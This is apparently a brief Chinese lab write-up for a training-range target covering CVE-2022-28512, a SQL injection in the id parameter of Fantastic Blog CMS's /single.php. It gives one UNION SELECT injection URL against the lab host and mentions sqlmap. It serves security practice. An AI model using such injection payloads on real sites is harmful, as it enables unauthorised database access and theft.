春秋云镜:CVE-2022-28512

  • 开发
  • 35

 靶标介绍:

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

分析/single.php一个id存在注入点

地址

http://eci-2ze1790muyig9irznr06.cloudeci1.ichunqiu.com/single.php?id=-1%27union%20select%201,2,3,4,5,6,7,8,9%E2%80%93+

sqlmap一把嗦手工

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2023-12-06 12:54:03       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-06 12:54:03       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2023-12-06 12:54:03       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2023-12-06 12:54:03       20 阅读

热门阅读

  9. 工商业分布式光伏电站的盈利模式有哪些?

    2023-12-06 12:54:03       54 阅读

  13. [数据结构]串、数组 C++编程作业

    2023-12-06 12:54:03       29 阅读

  16. 多场景多任务优化

    2023-12-06 12:54:03       40 阅读

  17. 第九章 Map

    2023-12-06 12:54:03       36 阅读

  24. 介绍 TensorFlow 的基本概念和使用场景

    2023-12-06 12:54:03       38 阅读